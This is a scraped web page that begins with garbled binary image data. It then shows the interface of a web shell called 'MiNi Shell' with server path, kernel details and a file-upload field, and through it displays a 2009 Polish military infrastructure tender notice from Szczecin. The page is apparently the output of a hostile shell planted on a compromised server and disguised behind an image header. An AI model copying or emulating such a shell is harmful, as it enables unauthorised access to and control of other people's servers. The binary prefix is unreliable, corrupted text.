JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090724/252986-N-2009.html

<p class="kh_header"><b>Szczecin: Usługa polegająca na wykonaniu Programu organizacyjno-użytkowego i Dokumentacji Projektowej w oparciu miedzy innymi o Minimalne Wojskowe Wymagania Organizacyjno-Użytkowe z dnia 14.05.2009 r., wizję lokalną i potrzeby wynikające z tej wizji (np. wykonanie przyłączy itp.), które są niezbędne do zapewnienia kompletności opracowania z punku widzenia celu, któremu ma służyć przedmiotowa dokumentacja</b><br>
<b>Numer ogłoszenia: 252986 - 2009; data zamieszczenia: 24.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Narutowicza 17B, 70-240 Szczecin, woj. zachodniopomorskie, tel. 091 8892000, 8892026, faks 091 8892024, 8892029, 4331054.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa polegająca na wykonaniu Programu organizacyjno-użytkowego i Dokumentacji Projektowej w oparciu miedzy innymi o Minimalne Wojskowe Wymagania Organizacyjno-Użytkowe z dnia 14.05.2009 r., wizję lokalną i potrzeby wynikające z tej wizji (np. wykonanie przyłączy itp.), które są niezbędne do zapewnienia kompletności opracowania z punku widzenia celu, któremu ma służyć przedmiotowa dokumentacja.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot  zamówienia podzielony jest na dwie części (dwa budynki):
 
a) Część I - Zad. 14535 Remont budynku koszarowego nr 24 w kompleksie 4222  w Darłowie
 Szacunkowa wartość dla części I zamówienia - 78 373,00 zł 

  b) Część II -  Zad. 14536 Remont budynku koszarowego nr 26 w kompleksie 4222 w Darłowie
Szacunkowa wartość zamówienia dla części II - 93 231,00  zł
 
 
Szacunkowa wartość całego zamówienia: 171 604,00 PLN..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.23.20.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 245.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości  5 000,00 zł dla całości zamówienia   
 Wadium dla części I : 2 300,00 zł
 Wadium dla części II: 2 700,00 zł  
Zamawiający będzie wymagał  wniesienia Zabezpieczenia Należytego Wykonania Umowy w wysokości 3%<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zgodnie z art. 22 Ustawy PZP o zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
a)Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
b)Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
c)Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego 
na podstawie art. 24 ust. 1 i 2 UPZP.  
Ocena: Spełnia/Nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> (dla każdej części zamówienia z osobna):
A.W celu potwierdzenia posiadania przez Wykonawcę uprawnień do wykonywania określonej działalności pozwalającej na realizację zamówienia. 
a)aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej w zakresie usług umożliwiających wykonanie przedmiotu zamówienia, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.

B.W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę, doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi  do wykonania zamówienia, zamawiający żąda następujących dokumentów:
1)  Wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, załączając kopię uprawnień oraz potwierdzenie aktualnej przynależności do właściwej izby samorządu zawodowego. 
Warunek spełnia wykazanie osób z uprawnieniami budowlanymi do projektowania w zakresie:
a) specjalności architektonicznej, 1 osoba
b) specjalności konstrukcyjno-budowlanej 1 osoba
c) specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych - 1 osoba
d) specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - 1 osoba,
e) projektowania systemów alarmowych klasy SA-4 - 1 osoba

2) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Do wykazu załączyć dokumenty potwierdzające, że usługi zostały wykonane należycie, np.: referencje, zaświadczenia itp.
Warunek spełnia wykonanie min. 2 usług (np. wykonanie dokumentacji projektowej budynku administracyjno-biurowego itp.) jw. każda na kwotę min. 50.000 zł, niezależnie czy były objęte klauzulą tajności (podać wartość, datę oraz miejsce wykonania). 

3)  Dokumentów potwierdzających spełnienie warunków dopuszczenia do informacji niejawnych, tj:
a)  Wykaz n/w osób zawierający numery poświadczeń bezpieczeństwa upoważniające do dostępu do informacji niejawnych stanowiących tajemnicę służbową o klauzuli POUFNE  i datę ich ważności:
 - kierownika firmy 
 - pełnomocnika ds. ochrony informacji niejawnych;
 - projektanta systemów alarmowych
b)  Kopie poświadczeń bezpieczeństwa osób wymienionych w części VII SIWZ ust. 2 pkt 2) lit. B pkt. 3) ppkt. a).
c) Kopie zaświadczeń o odbyciu szkolenia z zasad ochrony informacji niejawnych wszystkich osób o których mowa w części VII SIWZ ust. 2 pkt 2) lit. B pkt. 3) ppkt. a).
d) Oświadczenie o posiadaniu kancelarii tajnej (wraz z adresem kancelarii oraz podaniem przewoźnika, do którego złożono zamówienie na wykonanie uług w zakresie przewożenia materiałów niejawnych) i pomieszczeń umożliwiających prowadzenie prac z dokumentacją niejawną. 
e)  Kopię świadectwa ukończenia kursu przez projektanta w zakresie projektowania systemów alarmowych klasy SA-4 (o którym mowa w części VII SIWZ  ust. 2 pkt 2) lit. B pkt. 1)  ppkt. e)
f) Kopię strony tytułowej Szczególnych Wymagań Bezpieczeństwa (SWB) i  Procedur Bezpiecznej Eksploatacji (PBE) z podpisem i pieczęcią organu akceptującego (SKW lub ABW) na zestaw komputerowy, na którym wytwarzana będzie dokumentacja będąca przedmiotem umowy lub kopię certyfikatu akredytacji bezpieczeństwa teleinformatycznego (rozdział 10 ustawy z dnia 22.01.1999 r. o ochronie informacji niejawnych Dz. U. z 2005 r. Nr 196 poz. 1631).

Uwaga! Załącznikiem do umowy będzie Instrukcja Bezpieczeństwa Przemysłowego, w której zostaną sprecyzowane szczegółowe wymagania dotyczące ochrony przekazanych i wytworzonych materiałów niejawnych oraz skutki i zakres odpowiedzialności z tytułu nienależytego wykonania obowiązku ich ochrony.

C.W  przypadku  składania   oferty  wspólnej  (przez   konsorcjum)   Wykonawcy   ustanowią pełnomocnika  do  reprezentowania   ich   w  postępowaniu  o udzielenie zamówienia  albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego.

Brak jakiegokolwiek oświadczenia, dokumentu, o których mowa w części VII SIWZ  ust. 2 pkt. 1) i 2) jak 
i udzielenie informacji nieprawdziwej spowoduje wykluczenie Wykonawcy i uznania oferty za odrzuconą (art. 24 ust. 1÷4)
UWAGA: Wszystkie dokumenty wymienione w części VII SIWZ ust 2 pkt 2) litt. A i B  winny być złożone w oryginale lub poświadczone przez upoważnioną osobę kopii.

Dokumenty określone w części VII SIWZ ust. 2 pkt. 2) lit. A  ppkt. a)  składają wszyscy członkowie konsorcjum..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.przetargi.rzi.szczecin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jak w punkcie I.1)Po uiszczeniu opłaty na konto  RZI Szczecin Nr 97 1010 1599 0023 8113 9150 0000 w wysokości 23,00 PLN  z opisem opłata za SIWZ nr sprawy 025/UPT/2009.WykonZe strony bezpłatnie..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2009 godzina 10:00, miejsce: Siedziba RZI Szczecin.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - Zad. 14535 Remont budynku koszarowego nr 24 w kompleksie 4222  w Darłowie - wykonanie programu organizacyjno-użytkowego i dokumentacji projektowej..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 14535 Remont budynku koszarowego nr 24 w kompleksie 4222  w Darłowie - wykonanie programu organizacyjno-użytkowego i dokumentacji projektowej.
Szacunkowa wartość dla części I zamówienia -78 373,00 zł.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.23.20.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 245.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II -  Zad. 14536 Remont budynku koszarowego nr 26 w kompleksie 4222 w Darłowie - wykonanie programu organizacyjno-uzytkowego i dokuemntacji projektowej..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 14539 Remont budynku koszarowego nr 26 w kompleksie 4222 w Darłowie - wykonanie programu organizacyjno-uzytkowego i dokuemntacji projektowej.
Szacunkowa wartość zamówienia dla części II - 93 231,00 zł.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.23.20.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 245.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com